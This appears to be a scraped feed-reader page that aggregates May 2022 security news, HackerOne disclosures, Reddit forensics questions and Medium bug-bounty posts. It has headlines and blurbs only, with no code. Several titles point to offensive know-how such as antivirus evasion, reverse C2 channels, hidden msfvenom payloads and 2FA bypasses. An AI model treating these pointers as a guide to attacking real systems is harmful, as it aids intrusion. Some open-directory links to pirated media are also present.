    HTB-467-Noter by o1hy Gmail对附件的限制 by ourren IEEE S&P 2022 云端报道(3) by ourren IEEE S&P 2022 云端报道(2) by ourren IEEE S&P 2022 云端报道(1) by ourren 云原生安全Tetragon案例之安全产品自防护 by ourren SHADEWATCHER: 基于系统审计记录和推荐概念的网络威胁分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-25 Review
    HTB-467-Noter by o1hy Gmail对附件的限制 by ourren IEEE S&P 2022 云端报道(3) by ourren IEEE S&P 2022 云端报道(2) by ourren IEEE S&P 2022 云端报道(1) by ourren 云原生安全Tetragon案例之安全产品自防护 by ourren SHADEWATCHER: 基于系统审计记录和推荐概念的网络威胁分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    Operation Delilah: Unit 42 Helps INTERPOL Identify Nigerian Business Email Compromise Actor
    INTERPOL and The Nigeria Police Force arrested a prominent business email compromise actor as part of Operation Delilah. The post Operation Delilah: Unit 42 Helps INTERPOL Identify Nigerian Business Email Compromise Actor appeared first on Unit42.
  • Open

    How to conduct a security audit of Power BI?
    I want to conduct a security audit of Power Bi. What I mean by security audit: 1) List of all workspaces; 2) List of all reports/dashboards/etc and permissions (who have access and with whom shared) Do you know what role I need in O365 to have permission to see such information? Right now I can see only "My workspace", but I need a list of all workspaces of my organization. Does someone have experience with security assessment/audit of Power Bi? submitted by /u/athanielx [link] [comments]
    Security Testing/Assessment - Sharepoint Plugin
    How one can assess the security of available plugins for sharepoints? ​ AMREIN has a large number of plugins available. Business has requested security checks before purchase. Can someone share security checklist for plugins or available tools on web to test? What are the common concerns around plugins? submitted by /u/Anahata___ [link] [comments]
  • Open

    FreeBuf早报 | 澳印日美四国承诺深化数据安全合作;首个针对6G网络的攻击手法曝光
    澳大利亚、印度、日本和美国四国联盟的领导人24日进行了会晤,承诺在信息安全、数据共享等方面深化合作。
    端口扫描那些事
    请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。
    【超详细】Vulnhub靶场之----DC-3
    超详细Vulnhub靶场之----DC-3分享学习。
    天翼云安全实验室 | 一次钓鱼邮件溯源的技术分享
    近期钓⻥邮件攻击事件频发,天翼云安全实验室选取了一封钓鱼邮件进行分析与溯源,同大家一起提高警惕,防御钓鱼邮件攻击。
    WEB安全基础篇-跨站脚本攻击(XSS)
    跨站脚本攻击(XSS)是客户端安全的头号大敌,OWASP TOP 10多次把xss列在榜首。
    网传搜狐遭遇史诗级邮件诈骗,张朝阳回应来了
    张朝阳称搜狐一个员工的内部邮箱密码被盗,骗子冒充财务部给员工发钓鱼邮件,总损失金额在5万元以内。
    勒索软件攻击正以惊人的速度增加
    根据最新报告,勒索软件泄露事件增加了 13%。
    小心你的钱包!微软警告更加隐蔽的支付凭证窃取攻击
    微软安全人员最近观察到使用多种混淆技术来避免检测的网页掠夺攻击。这些攻击大多被用来针对电商等平台以窃取用户支付凭证。
    鼎茂科技:数据+AI增强安全运营 | 网安新势力SOLO发布季
    解决各类数据治理问题,AIOps该如何贴近业务需求?网安新势力SOLO发布季告诉你答案。
  • Open

    Learning Linux & InfoSec Principles Using OverTheWire’s Bandit — Part 4
    No content preview
    Approaching CTF OSINT Challenges — Learn by Example
    No content preview
    TryHackMe writeup: HackPark
    No content preview
    Nunchucks from HackTheBox — Detailed Walkthrough
    No content preview
    Antivirus Evasion — Part 1
    No content preview
    Hacking Web3: Introduction and How to Start
    No content preview
    Kerberos Authentication in Active Directory
    No content preview
  • Open

    Learning Linux & InfoSec Principles Using OverTheWire’s Bandit — Part 4
    No content preview
    Approaching CTF OSINT Challenges — Learn by Example
    No content preview
    TryHackMe writeup: HackPark
    No content preview
    Nunchucks from HackTheBox — Detailed Walkthrough
    No content preview
    Antivirus Evasion — Part 1
    No content preview
    Hacking Web3: Introduction and How to Start
    No content preview
    Kerberos Authentication in Active Directory
    No content preview
  • Open

    Learning Linux & InfoSec Principles Using OverTheWire’s Bandit — Part 4
    No content preview
    Approaching CTF OSINT Challenges — Learn by Example
    No content preview
    TryHackMe writeup: HackPark
    No content preview
    Nunchucks from HackTheBox — Detailed Walkthrough
    No content preview
    Antivirus Evasion — Part 1
    No content preview
    Hacking Web3: Introduction and How to Start
    No content preview
    Kerberos Authentication in Active Directory
    No content preview

  • Open

    Critical broken cookie signing on dagobah.flickr.com
    Flickr disclosed a bug submitted by ian: https://hackerone.com/reports/1440290 - Bounty: $479
    [com.exness.android.pa Android] Universal XSS in webview. Lead to steal user cookies
    EXNESS disclosed a bug submitted by nearsecurity: https://hackerone.com/reports/532836 - Bounty: $400
    Cross-site scripting on dashboard2.omise.co
    Omise disclosed a bug submitted by oblivionlight: https://hackerone.com/reports/1532858 - Bounty: $200
  • Open

    Windows Firewall Event Logs
    I have a ransomeware attack and am looking at several event logs from a local machine on the network that show rules being added, changed, and deleted reference the Windows Firewall. These events are consistent on almost a daily basis and occur almost exclusively during the early morning hours when the business was closed for several weeks leading up to the implementation of the ransomeware. Other than the attackers, is there any normal circumstances that may have caused this on such a consistent basis, such as normal updates? With that being said, I am limited on verifying a lot of evidence as the business had already wiped their servers and most local machines by the time I got involved… so I’m pretty much limited to this single computer to figure out what I can. submitted by /u/outdorksman [link] [comments]
    Practice Investigating Linux Systems using only Linux CLI + Cyber5W Mini CTF Hints
    submitted by /u/DFIRScience [link] [comments]
    Private Investigator / DFIR crossover?
    Some of my coworkers have their PI licenses, and becoming a DF/PI consultant is something that I've toyed with. I have intelligence and an LE background, so it's not a crazy idea. Does anyone have any experience going this route? TIA! submitted by /u/FAlady [link] [comments]
    Postgraduate Degree Dilemma
    I am 22 and i just graduated with Bcs Computer and Digital Forensics Degree. I am considering to take a master degree but i didn’t decide yet what to do. My first choice is to continue in relevant field of my bachelor degree and pursuing further education on Digital Forensics with Masters like Msc Cybersecurity, Msc Digital Forensics or Msc Advance Computer Science. My second option is to take a LLM Cyber Law Master as i was always interested on this area. My concern is wether the LLM Cyber Law degree will actual help me and reinforce my bachelor degree and give me a good combination of degrees to Job field, rather be an irrelevant master degree. Another thing,Is it good idea to study LLM Cyber Law without having a basic Law degree and how this will effect me in Job field. Im really trying to figure out what you think is best from your perspective.I want to hear any advice or recommendations you may have. submitted by /u/AshMustard15 [link] [comments]
  • Open

    How to Buy X Doge Token ($X) — Beginner’s Guide
    Continue reading on Medium »
    VulnHub: CySec: 2
    Today we will take a look at Vulnhub: CySec 2. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to… Continue reading on Medium »
  • Open

    Multiple vulnerabilities in radare2
    submitted by /u/soupcreamychicken [link] [comments]
    Malware Campaign Targets InfoSec Community: Threat Actor Uses Fake Proof of Concept to Deliver Cobalt-Strike Beacon
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    fire: Fast tool to filter resolved domains (good for Bug Bounty purposes in a pipeline of scripts)
    submitted by /u/deleee [link] [comments]
    New Rhino Blog Post: CVE-2022-25237: Bonitasoft Authorization Bypass and RCE
    submitted by /u/hackers_and_builders [link] [comments]
    GitHub - Peco602/findwall: Check if your provider is blocking you!
    submitted by /u/Peco602 [link] [comments]
    Cisco Issues Patch for New IOS XR Zero-Day Vulnerability Exploited in the Wild
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    River: a tool for quantitative media analysis
    A web app for tracking and comparing new agencies’ reporting on the Russia-Ukraine war. Continue reading on Medium »
    War in Ukraine / May 23
    The war in the center of Europe has been going on for three months Continue reading on Medium »
    Check Which APT Group Targets your Organization
    Today we will see how to identify which APT Group is interested in your organization to attack. Continue reading on Medium »
  • Open

    GitBook Email HTML INJECTION
    Halo teman teman perkenalkan nama saya Mohammad Alfin Hidayatullah, Saya adalah seorang Bug Bounty Hunter. Kali ini saya akan membagi… Continue reading on Medium »
    Bware Labs Bets $100,000 on Blast quality by launching a Bug Bounty campaign
    We are thrilled to announce the launch of our bug bounty program on Blast, in partnership with Immunefi, Web3’s leading bug bounty… Continue reading on Bware Labs »
    How I found SSRF external interaction on Bugcrowd Public program in 5 min
    Tools - https://subdomainfinder.c99.nl/ - burp suite - burp Collaborator  - assetfinder : https://github.com/tomnomnom/assetfinder - httpx… Continue reading on Medium »
    How to effectively hunt for vulnerabilities in Wordpress Sites
    Hi Sleepyheads! Miss me? Continue reading on Medium »
    HTTP Response Splitting [CWE-113] — The Hacktivists
    HTTP Response Splitting weakness describes improper neutralization of CRLF sequences in HTTP headers. Continue reading on Medium »
    Improper Handling of Length Parameter Inconsistency [CWE-130] — The Hacktivists
    Improper Handling of Length Parameter Inconsistency is a security weakness that describes improper handling of a length field for… Continue reading on Medium »
    Off-by-one Error [CWE-193] — The Hacktivists
    Off-by-one error occurs when a program uses an improper maximum or minimum value that is one more or one less than the proper value. Continue reading on Medium »
    PHP File Inclusion [CWE-98] — The Hacktivists
    PHP File Inclusion weakness describes improper control of filename within Include() or Require() statements in a PHP program. Continue reading on Medium »
  • Open

    Event log persistence
    submitted by /u/Alareon [link] [comments]
  • Open

    SecWiki News 2022-05-24 Review
    基于XDR的网络安全体系思考与实践 by ourren SecWiki周刊(第429期) by ourren 基于嵌入的知识图谱实体对齐的基准研究 by ourren 针对域名历史信誉的潜在滥用 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-24 Review
    基于XDR的网络安全体系思考与实践 by ourren SecWiki周刊(第429期) by ourren 基于嵌入的知识图谱实体对齐的基准研究 by ourren 针对域名历史信誉的潜在滥用 by Avenger 更多最新文章,请访问SecWiki
  • Open

    Creating Reverse C2 Channel with C# Powershell and Python
    I know C2 servers are always handy, especially when they bypass most of Anti-Virus solutions. Continue reading on Medium »
  • Open

    Pwnton Pack: An Unlicensed 802.11 Particle Accelerator
    This past Christmas, I received a terrific gift from my in-laws: a replica Ghostbusters Proton Pack. I was thrilled. You see, growing up in the mid 80s, Ghostbusters was my jam. Fast forward 37 years and with the recent Ghostbusters: Afterlife film release, my nostalgia was hitting a fever pitch. Shortly after our Christmas dinner,... The post Pwnton Pack: An Unlicensed 802.11 Particle Accelerator appeared first on TrustedSec.
  • Open

    FreeBuf早报 | 马克·扎克伯格因数据泄露事件被起诉;国家网络武器将很快在暗网上出现
    国际刑警组织秘书长Jurgen Stock警告,由国家开发的网络武器会在“几年”后出现在暗网上。
    2021 Owasp top 10 逐个击破,A02 Cryptographic Failures
    以前称为敏感数据暴露,像是一种广泛的症状而不是根本原因,重点是与密码相关的失败(或缺乏密码)。这通常会导致敏感数据的泄露。
    招聘丨度小满金融安全部等待着你的到来
    度小满金融,致力于用科技为更多人提供值得信赖的金融服务。2018年4月28日,百度旗下金融服务事业群组完成拆分融资,启用全新品牌“度小满金融” 。
    奥地利、爱沙尼亚重要机构或正成为俄黑客目标
    由俄罗斯政府支持的黑客组织“图拉”(Turla)正在对奥地利经济商会、北约平台、波罗的海国防学院发动一系列攻击。
    《关于推进实施国家文化数字化战略的意见》发布,再次强调数据安全
    《意见》明确,到“十四五”时期末,基本建成文化数字化基础设施和服务平台,形成线上线下融合互动、立体覆盖的文化服务供给体系。
    通用汽车遭撞库攻击被暴露车主个人信息
    经调查后发现黑客在某些情况下将客户奖励积分兑换为礼品卡。
    支付巨头PayPal曝大漏洞,黑客可直接窃取用户资金
    其攻击原理是利用点击劫持技术诱导用户进行点击,在不知不觉中完成交易,最终达到窃取资金的目的。
  • Open

    How I Found a company’s internal S3 Bucket with 41k Files
    No content preview
    Cybersecurity & Application Attacks
    Buffer Overflow and XSS Cross-site Scripting attacks for SY0–601 Continue reading on InfoSec Write-ups »
  • Open

    How I Found a company’s internal S3 Bucket with 41k Files
    No content preview
    Cybersecurity & Application Attacks
    Buffer Overflow and XSS Cross-site Scripting attacks for SY0–601 Continue reading on InfoSec Write-ups »
  • Open

    How I Found a company’s internal S3 Bucket with 41k Files
    No content preview
    Cybersecurity & Application Attacks
    Buffer Overflow and XSS Cross-site Scripting attacks for SY0–601 Continue reading on InfoSec Write-ups »

  • Open

    Open redirect bypass
    Flickr disclosed a bug submitted by xlord91: https://hackerone.com/reports/1513031 - Bounty: $300
    Stored XSS in photos_user_map.gne
    Flickr disclosed a bug submitted by keer0k: https://hackerone.com/reports/1534636 - Bounty: $3263
    [python]: Zip Slip Vulnerability
    GitHub Security Lab disclosed a bug submitted by farid_hunter: https://hackerone.com/reports/1572496 - Bounty: $1000
    [Java]: Flow sources and steps for JMS and RabbitMQ
    GitHub Security Lab disclosed a bug submitted by someonenobbd: https://hackerone.com/reports/1579235
  • Open

    How can I download full folders on my android phone keeping directory structure?
    I tried using 1DM but it puts all files into the same directory. I tried using grabber, changing the recursion, batch downloads, etc but I am not getting this to work. I read through the sticky post but it didn't seem to have the answer. Any recommendations? submitted by /u/Terrible_Feature-532 [link] [comments]
    batch of movies
    submitted by /u/wiener_dawg [link] [comments]
    [Request] Anyone has the TV shows: Blossom (1990) & Brotherly Love (1995)
    submitted by /u/ShakeSpearow [link] [comments]
  • Open

    Ukraine Update 5–23–22
    The following are compiled from a variety of sources, and especially from a live Reddit thread which I follow closely. I compile these… Continue reading on Medium »
    War in Ukraine / May 20–22
    Up to 100 Heroes of Ukraine die every day in the East Continue reading on Medium »
    KILLNET, LEGION, MIRAI & co.: Breve OSINT sugli obiettivi italiani e relativo rischio.
    E’ dell’11 maggio la notizia su Repubblica: “Attacco hacker all’Italia. Cos’è Killnet, il gruppo russo che lo ha rivendicato”… Continue reading on Medium »
    OSINT Course Online (Open-source Intelligence)
    In this course, you will learn about OSINT (open-source intelligence) from a hacker’s point of view. Continue reading on Medium »
    My speech in the Russian Parliament will take place in June
    My speech at the Federation Council of the Russian Federation on the creation in Russia of a specialized center of competence in the field… Continue reading on Medium »
  • Open

    A few Tailscale tricks for security testers
    submitted by /u/MysteriousHotel3017 [link] [comments]
    Hiding MSFVENOM Payloads in USB NIC EEPROM
    submitted by /u/lightgrains [link] [comments]
    Beneath the surface: Uncovering the shift in web skimming
    submitted by /u/SCI_Rusher [link] [comments]
    mx-takeover focuses DNS MX records and detects misconfigured MX records.
    submitted by /u/0xmusana [link] [comments]
    I wrote this more from an "analyze rootkit" perspective, but it's equally as valid for "driver bug hunting". Hope you enjoy.
    submitted by /u/0x4ndr3 [link] [comments]
    Exploit Development: No Code Execution? No Problem! Living The Age of VBS, HVCI, and Kernel CFG
    submitted by /u/0xdea [link] [comments]
  • Open

    Bug Bounty Diaries #3
    Hi guys! I’m back and before starting with the new blog I really wanna say THANK YOU to every follower, I’m glad to know that my blogs can… Continue reading on Medium »
    Miniseries: XSS to the core — Pt.2
    In the second part of our mini-series, we are going to look at the types of XSS and what we can do to evade those pesky filters! In the… Continue reading on Medium »
    Postponing TGE
    Dear Hats community, Continue reading on Medium »
    Top 25 SSRF Dorks | Bug Bounty
    Top 25 Server-Side Request Forgery (SSRF) Dorks Continue reading on Medium »
    Autorização de nível de objeto quebrado.
    Dando continuação a vulnerabilidades em API. Continue reading on Medium »
    Autenticação de usuário quebrada.
    Pretendo compartilhas com vocês algumas coisas que aprendi em livros e artigos, acredito que isso possa te ajudar. Continue reading on Medium »
    CVE-2022–1813 Blind Command Injection
    This Bug founded by Abdulrahman Abdullah. This is a python based web application in which there is no proper check on url parameter which… Continue reading on Medium »
    How I Get Bounty From Takeover Account
    Hi everyone how are you?, I hope you guys are well. I’m RyuuKhagetsu, this is my article in English, sorry if there are any mistakes. I… Continue reading on Medium »
  • Open

    Kind of a Wifi attack that isn't Evil Twin
    I wanted to know kind of wifi attack, such as Evil-Twin with Captive portal, that possible to implement the process or the idea behind that. Thank you submitted by /u/Echowns [link] [comments]
    Best path to cybersecurity as a self-taught developer
    Hello, so I currently have around 5 free months and I wanted to heavily utilize that time towards learning to program. My long-term goal would be to get into the cyber security field but I don't have the money to go for the relevant certifications at the moment. I wanted to know which options any of you think would equip me with the most transferable skills for when I finally make the switch into cyber sec. Because I figure it would be easier to get my foot into the IT industry as a developer. For example, I'm guessing that a full stack web developer would make a good transition into web security, or a software developer would do well in Application security. Given your expertise/knowledge of the field, which path would you take if you were to start out as a developer? submitted by /u/Shogun8693 [link] [comments]
  • Open

    SecWiki News 2022-05-23 Review
    GitHub Copilot的安全性评估 by ourren PE文件结构解析2 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-23 Review
    GitHub Copilot的安全性评估 by ourren PE文件结构解析2 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    The Hunt for the Red Team
    Red teaming is an important part of any security program because it gives you a real world exercise to test your security posture. You may… Continue reading on Medium »
    How do Red Team Exercises help CISO to Validate the Security Controls Effectively?
    Red Team Exercises are one of the best ways for CISOs to validate the security controls effectively. Continue reading on Medium »
  • Open

    【安全通报】Fastjson 1.2.80 及之前版本存在 Throwable 反...
    近日,Fastjson Develop Team 发布修复了 Fastjson 1.2.80 及之前版本存在的安全风险,该安全风险可能导致...
  • Open

    【安全通报】Fastjson 1.2.80 及之前版本存在 Throwable 反...
    近日,Fastjson Develop Team 发布修复了 Fastjson 1.2.80 及之前版本存在的安全风险,该安全风险可能导致...
  • Open

    Vulnerability that made us 30 000$ richer
    Article URL: https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/ Comments URL: https://news.ycombinator.com/item?id=31477994 Points: 2 # Comments: 1
  • Open

    Tryhackme’s OWASP Top 10
    So I have made it through a dozen or so hours of Tryhackme’s free learning path and am enjoying it, also have made through the first 6… Continue reading on Medium »
  • Open

    Recurrence and analysis of RPC high-risk Vulnerability(CVE-2022-26809)
    Author: HuanGMz@Knownsec 404 Team Chinese version: https://paper.seebug.org/1906/ 1.Vulnerability introduction It has been more than a month since the high-risk vulnerability CVE-2022-26809 was rep...
  • Open

    Recurrence and analysis of RPC high-risk Vulnerability(CVE-2022-26809)
    Author: HuanGMz@Knownsec 404 Team Chinese version: https://paper.seebug.org/1906/ 1.Vulnerability introduction It has been more than a month since the high-risk vulnerability CVE-2022-26809 was rep...
  • Open

    FreeBuf早报 | 韩国和美国总统联手应对朝鲜的网络攻击;俄遭网络攻击成倍上升
    韩国和美国总统联手应对朝鲜的网络攻击。
    埃隆•马斯克“助长”加密货币新骗局
    近日,有观察发现,诈骗者正在深度伪造埃隆·马斯克和其他知名加密货币倡导者的视频以推广BitVex交易平台并窃取存储货币。
    谷歌:Predator间谍软件使用零日漏洞感染Android设备
    国家支持的威胁行为者使用五个零日漏洞来安装由商业监控开发商Cytrox开发的Predator间谍软件。
    思科修复在野被利用的iOS XR漏洞
    思科解决了一个影响 iOS XR 软件的中等严重性漏洞,该漏洞在野外被积极利用。
    Pwn2Own 2022比赛最后一日,Windows 11接连被黑3次
    参赛者主要利用了Win11的权限提升漏洞。
    请注意,PDF正在传播恶意软件
    安全研究人员发现了一种新型的恶意软件传播活动,攻击者通过PDF附件夹带恶意的Word文档,从而使用户感染恶意软件。
    FreeBuf早报 | Conti勒索团伙宣布停运;美国司法部不再起诉白帽黑客
    据美国司法部公布一项政策调整,将不再对违反美国联邦黑客法《计算机欺诈与滥用法》(CFAA)的善意安全研究提起诉讼。

  • Open

    Secure Home Network
    Hello People, I would like to start making my private network more secure soon. Since I am forced by my provider to use a coaxial connection, this would have to be included in the IAD/router. What would you guys recommend for components for me to set up? Does it make sense to create a VLAN | Subnet on the home network? I don't have a lot of space unfortunately. Thank you in advance! submitted by /u/D3ATHB1RD [link] [comments]
    burp vs zap
    I have been solving portswigger labs... And due to burps intruder low speed switched to zap And now I can't solve a lab even after looking at the solutions... WTF please put me on the right path!! submitted by /u/Full_Albatross_5636 [link] [comments]
  • Open

    Mortar Loader v2 - 0xsp SRD
    submitted by /u/dmchell [link] [comments]
  • Open

    Ukraine Update 5–22–22
    The following are compiled from a variety of sources, and especially from a live Reddit thread which I follow closely. I compile these… Continue reading on Medium »
    Goodources on the war in Ukraine
    Wanted to share a list of resources that I find useful for researching aspects on the war in Ukraine: Continue reading on Medium »
    Viewing cyber attacks in real time on a world map
    There’s a couple of various resources available to see cyber attacks in real time around the world. These are helpful from an OSINT… Continue reading on Medium »
    Cybersecurity attacks against .RU
    Since the expansion of the war in Ukraine by Russia, there has been a barrage of cyber attacks against the Russian Federation from around… Continue reading on Medium »
    SPY NEWS: 2022 — Week 20
    Summary of the espionage-related news stories for the Week 19 (15–21 May) of 2022. Continue reading on Medium »
  • Open

    Email Verification Bypass by bruteforcing when setting up 2FA
    Evernote disclosed a bug submitted by cyberworlcload: https://hackerone.com/reports/1394984 - Bounty: $150
    Possible Domain Takeover on AWS Instance.
    Rocket.Chat disclosed a bug submitted by samuelsiv: https://hackerone.com/reports/1390782
  • Open

    Bypassing LDAP Channel Binding when LDAP Signing is not Enforced
    Hello folks (nerds), I happen to come across some new research that enables to completely bypass Active Directory (AD) Lightweight… Continue reading on Medium »
    Offensive and Defensive Security: CyberSec teams with Red and Blue Jerseys.
    Red teams simulate attacks in opposition to Blue teams to check the effectiveness of their infrastructure security. These exercises offer a Continue reading on Medium »
  • Open

    How does everyone find the directories?
    I don’t understand how people can find such random things? Do y’all simply google stuff or what? submitted by /u/StupidRedditorBTW [link] [comments]
    All Headspace meditations (till 2020) + Game ROMS of old consoles (GBA, NDS, etc...) + Popular TV shows + more random stuff
    Headspace: http://kbranch.us/public/Headspace%20-%20Meditation%20and%20Mindfulness%20Made%20Simple%20(2018)//) ROMS of old games: http://kbranch.us/public/ROMs/ TV shows: http://kbranch.us/public/tv/ And some more random stuff at http://kbranch.us/public/ submitted by /u/Pelicaros [link] [comments]
    Hundreds of gigabytes of TV series, music and movies. (In Russian)
    http://195.93.160.105/ submitted by /u/i-miss-you-so-much [link] [comments]
    A collection of mostly soviet-era cartoons (cheburashka for example)
    http://www.shchupak.com/multiki/ submitted by /u/i-miss-you-so-much [link] [comments]
    Tesla Service Manuals (Google Drive)
    Tesla Made their official Service Manuals accessible to users from their website www.service.tesla.com. Every PDF File from there, about Every Model, Accessories, Charger, Manuals, is mirrored onto GDrive. Check README file for more details. https://drive.google.com/drive/folders/1SVsmpITqgGbyRXEWGUC35AmPmR1SXRWo?usp=sharing submitted by /u/amritajaatak [link] [comments]
    About 750 academic books and journals from a single publisher
    https://tiendaeditorial.uca.es/descargas-pdf/ Site is the academic press of the Universidad de Cádiz. Most texts are in European Spanish, with a smattering of English and French. Many of the works concern the university or Cádiz. Topics are broad but mostly history, archaeology, linguistics, literature, poetry, with lesser amounts of math, medicine, science, computers, and others. submitted by /u/clarelucebooth [link] [comments]
  • Open

    Miniseries: XSS to the core — Pt.1
    Continue reading on Medium »
    AlbusSec:- Penetration-List 06 Command Injection — Sample
    Hi Information Security folk, I hope you liked the SQL-Injection Sample Series, Where You learned about SQL-Injection In-depth, However… Continue reading on Medium »
    Vulnerability In PayPal worth 200000$ bounty, Attacker can Steal Your Balance by One-Click
    what if I told you that: A black Hat hacker can steal your money from your bank account & credit card or PayPal balance with one click… Continue reading on Medium »
    2FA Bypass on private bug bounty program due to improper caching mechanism
    Hello All, Continue reading on Medium »
    2FA Bypass on private bug bounty program due to CSRF token misconfiguration
    Hello Friends, Continue reading on Medium »
    A good resource for learning penetration testing tools and methodology
    I was searching the internet and came across a good site to bypass 403, which could help me in many other topics … Continue reading on Medium »
  • Open

    connmap - X11 desktop widget that shows location of your current network peers on a world map
    submitted by /u/jafarlihi [link] [comments]
  • Open

    SecWiki News 2022-05-22 Review
    应急能力提升3:内网横向移动攻击模拟(上) by aerfa 应急能力提升2:挖矿权限维持攻击模拟 by aerfa 应急能力提升1:实战应急困境与突破 by aerfa 如何学习那么多的安全文章(实践篇) by aerfa 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-22 Review
    应急能力提升3:内网横向移动攻击模拟(上) by aerfa 应急能力提升2:挖矿权限维持攻击模拟 by aerfa 应急能力提升1:实战应急困境与突破 by aerfa 如何学习那么多的安全文章(实践篇) by aerfa 更多最新文章,请访问SecWiki
  • Open

    hackmyvm系列9——translator
    本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!所有环境均为在线下载的靶场,且在本机进行学习。
    MSF监听之加密流量下的后门上线
    本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
  • Open

    Can people with limited IT experience jump relatively straight into digital forensics?
    I’m interested in DF as a field ever since learning about it. I’m curious if I need to know a lot about cyber security and IT or if I can pick it up as I go along? Im talking about learning. A lot of the posts on Reddit say that you need to know about xyz well before you can get into “DFIR” but what if you’re just interested in digital forensics? submitted by /u/OpalDragonDagger [link] [comments]
    iPhone
    where can i purchase a cellebrite or software/product to review phone data such as photos, messages ect submitted by /u/PuzzleheadedRemote83 [link] [comments]
    How do you analyze memory acquisition from Windows 10 build 19044?
    Volatility2 does not have a profile beyond build 19041 yet and Volatility3 lacks of advanced plugins when it comes to malware analysis. How do you analyze a memory acquisition from Windows 10 build 19044? submitted by /u/jcbaptiste [link] [comments]
    Help needed with digital forensics case
    Hey guys. I’m currently studying a cyber security degree at a university and currently have to conduct digital forensics and form a report on a women who was suspected of malpractice (case back from 2014). I have evidence but it can be considered circumstantial. I’ve been using Autopsy (which is great), but I feel there is something missing that is tying all my evidence together. I’ve been given all their windows computer files. If you guys could possibly give me a few places to look at that would be great! Thanks!! submitted by /u/be-10 [link] [comments]
  • Open

    OTP Bypass on Vahak.in
    No content preview
    TryHackMe: Biblioteca
    No content preview
  • Open

    OTP Bypass on Vahak.in
    No content preview
    TryHackMe: Biblioteca
    No content preview
  • Open

    OTP Bypass on Vahak.in
    No content preview
    TryHackMe: Biblioteca
    No content preview

  • Open

    Accidentally posted nudes need help.
    Accidentally posted nudes to my snapchat story for 9 minutes before I realized and deleted them. The problem is I was so panicked at the time that I didnt check if anyone screenshotted them. Is there any possible way I could reach out to snapchat and find that deleted story? submitted by /u/KazaixX [link] [comments]
    Computer Forensics Help
    Hi everyone, I'm taking a digital forensics course soon. It'll start in a few weeks, but I would really like some advice or help on where to start. I'm really sorry to be so vague, but I genuinely don't know anything about this topic. I'm not sure where to start or what to do or how to study for it. I tried to google for maybe online textbooks or codelabs or something like that, but I feel like the resources are all over the place and it's just been really overwhelming to start. All the posts I've been reading here...I have no idea what they're talking about. And it's a bit sad because I would love to contribute to some of the discussions here, but I just don't know how. It's the start of summer, so I definitely have more time than usual. So I'd like a really good head start on the course that will start in a few weeks. If you had to give a complete newbie advice on where to start, I'd very very much appreciate it. Thank you! [link] [comments]
    Mac Forensics: Digital Collector vs. Recon RTI
    Greetings r/computerforensics, We've seen a huge decline in Macs hitting our lab over the last few years, but they still sprinkle in every now and then. We're evaluating our current licences and dropping our least used. For our primary Mac tool, we have to decide between Cellebrite Digital Collector and Sumuri Recon RTI. We're leaning to Recon, but would love to hear feedback on what you all are using and why. submitted by /u/BlockchainForensics [link] [comments]
  • Open

    Essential links for SOC Analysts
    Hi everyone. Previously, I shared an article on Essential tools for SOC analysts. Here I wanted to share a link-based post essential… Continue reading on Medium »
    Free DLP and personnel monitoring systems
    Today we will bypass OSINT-ers and make a selection for security people. Employee control systems and DLP. Simple but free: Continue reading on Medium »
  • Open

    Critical Vulnerability in Premium WordPress Themes Allows for Site Takeover
    Article URL: https://threatpost.com/vulnerability-wordpress-themes-site-takeover/179672/ Comments URL: https://news.ycombinator.com/item?id=31461535 Points: 2 # Comments: 0
    $10m bug bounty paid for Wormhole vulnerability
    Article URL: https://medium.com/immunefi/wormhole-uninitialized-proxy-bugfix-review-90250c41a43a Comments URL: https://news.ycombinator.com/item?id=31459244 Points: 2 # Comments: 0
  • Open

    How “Forgot Password” can cost you your account
    Continue reading on Medium »
    CVE-2022–1784 The Ssrf
    In this write up i am going to tell you about this awesome ssrf found by Hexatron rewarded with 900$ bounty Continue reading on Medium »
    A business Logic issue worth $1500
    Hello everyone, Continue reading on Medium »
    PayPal IDOR via billing Agreement Token (closed Informative, payment fraud)
    Continue reading on Medium »
    How I was able to down a service of Microsoft ? Denial of Service (DOS) Attack on Microsoft.
    Thank you for taking the time to read about “How I was able to down a service of Microsoft ? Denial of Service (DOS) Attack on Microsoft“ Continue reading on Medium »
  • Open

    SecWiki News 2022-05-21 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-21 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Metastealer – filling the Racoon void
    submitted by /u/digicat [link] [comments]
  • Open

    Client Side Bug, EP1 — Cross-site Request Forgery (CSRF/XSRF)
    Bug yang akan ‘memaksa’ user untuk melakukan sesuatu yang berbahaya! Continue reading on Medium »
  • Open

    Krátke ohliadnutie za výstavou— Pseudosféra Kláry Kusej
    V uličke tesne pri Michalskej bráne sa nachádza menšia galéria umenia - Galéria X. Continue reading on Medium »
  • Open

    A moderately sized GD folder with books and PDFs on hacking, cracking, networking and programming
    https://drive.google.com/drive/mobile/folders/1F7D5c30nP-y_Q7SFqoRTRvJ7tl0UcY3q submitted by /u/idkbutiwannalearn [link] [comments]
    Where can I find 3d character packs for free like businessman billy?
    The businessman billy pack has 2-3 similar packs too it, can someone please help me get them? A female 3d character pack will be ideal, I have only got the businessman billy pack from a local graphic designer's website. submitted by /u/Pythagoras16 [link] [comments]
  • Open

    How to make a used computer safe
    I bought a used MacBook Pro and want to make sure it's safe. I went into recovery mode (Cmd + R on boot) and reinstalled OSX. Is this sufficient to make sure any possible malware has been removed? What additional measures can/should I take to ensure the company is safe? submitted by /u/digitil [link] [comments]

  • Open

    Matryoshka Trap: Recursive MMIO Flaws Lead to VM Escape
    submitted by /u/Bison-Neat [link] [comments]
    When eBPF meets TLS! A Security Focused Introduction to eBPF
    submitted by /u/guedou [link] [comments]
    Hacking Chinese IoT FoR $10000
    submitted by /u/sciencestudent99 [link] [comments]
